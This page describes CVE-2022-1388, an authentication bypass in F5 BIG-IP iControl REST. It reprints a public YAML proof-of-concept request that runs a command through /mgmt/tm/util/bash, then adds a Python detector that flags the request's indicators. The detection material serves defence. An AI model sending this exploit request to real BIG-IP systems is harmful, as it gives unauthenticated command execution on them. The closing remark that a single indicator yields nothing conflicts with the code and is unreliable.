CVE-2022-1388: F5 BIG-IP iControl REST Auth Bypass RCE

Date: 2025-09-01 | Affected software: F5 BIG-IP | PoC: public

Vulnerability description

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.

PoC code [public]

id: CVE-2022-1388

info:
  name: F5 BIG-IP iControl REST Auth Bypass RCE
  author: dwisiswant0
  severity: critical
  description: |
    This vulnerability may allow an unauthenticated attacker
    with network access to the BIG-IP system through the management
    port and/or self IP addresses to execute arbitrary system commands,
    create or delete files, or disable services. There is no data plane
    exposure; this is a control plane issue only.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
    - https://support.f5.com/csp/article/K23605346

set:
  user: "base64('admin:')"
rules:
  r0:
    request:
      method: POST
      path: /mgmt/tm/util/bash
      headers:
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{user}}
        Content-Type: application/json
      body: |
        {
          "command": "run",
          "utilCmdArgs": "-c id"
        }
    expression: response.status == 200 && response.body.bcontains(b'commandResult') && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()
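Seen from the detection side, the PoC above has a fixed shape: a POST to /mgmt/tm/util/bash that names X-F5-Auth-Token in the Connection header (so the front end drops the token as hop-by-hop), carries a placeholder token plus Basic auth for admin with an empty password, and sends a JSON body with "command": "run". The following added example, not part of the original page or of any F5 tooling, parses raw HTTP/1.1 request text and reports which of those indicators are present; the sample request and hostname are constructed for illustration.

```python
import base64
import re

ICONTROL_BASH_PATH = "/mgmt/tm/util/bash"  # endpoint the PoC above posts to
TOKEN_HEADER = "x-f5-auth-token"  # header the PoC names in Connection

def parse_request(raw: str) -> tuple[str, str, dict[str, str], str]:
    """Split a raw HTTP/1.1 request into method, path, lower-cased header map and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def basic_auth_has_empty_password(value: str) -> bool:
    """True when an 'Authorization: Basic ...' value decodes to 'user:' with an empty password."""
    if not value.lower().startswith("basic "):
        return False
    try:
        decoded = base64.b64decode(value[6:].strip(), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return ":" in decoded and decoded.split(":", 1)[1] == ""

def cve_2022_1388_indicators(raw: str) -> list[str]:
    """Return the CVE-2022-1388 indicators found in one raw request; [] means none matched."""
    method, path, headers, body = parse_request(raw)
    findings = []
    # Hop-by-hop abuse: naming X-F5-Auth-Token in Connection makes the front end drop it.
    connection = [t.strip().lower() for t in headers.get("connection", "").split(",")]
    if TOKEN_HEADER in connection:
        findings.append("connection-header-drops-auth-token")
    if TOKEN_HEADER in headers and basic_auth_has_empty_password(headers.get("authorization", "")):
        findings.append("basic-auth-empty-password-with-token-header")
    if method == "POST" and path.startswith(ICONTROL_BASH_PATH):
        findings.append("icontrol-util-bash-post")
        if re.search(r'"command"\s*:\s*"run"', body):
            findings.append("util-bash-run-command")
    return findings

# Constructed sample request (not captured traffic) in the shape of the PoC above.
SAMPLE_REQUEST = (
    "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: bigip.example.invalid\r\n"
    "Connection: keep-alive, X-F5-Auth-Token\r\nX-F5-Auth-Token: a\r\n"
    "Authorization: Basic " + base64.b64encode(b"admin:").decode() + "\r\n"
    'Content-Type: application/json\r\n\r\n{"command": "run", "utilCmdArgs": "-c id"}'
)
```

A single indicator (for example a legitimate token request with keep-alive) yields nothing; the Connection-header indicator alone is the one worth alerting on, since no legitimate client has a reason to declare the auth token header hop-by-hop.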
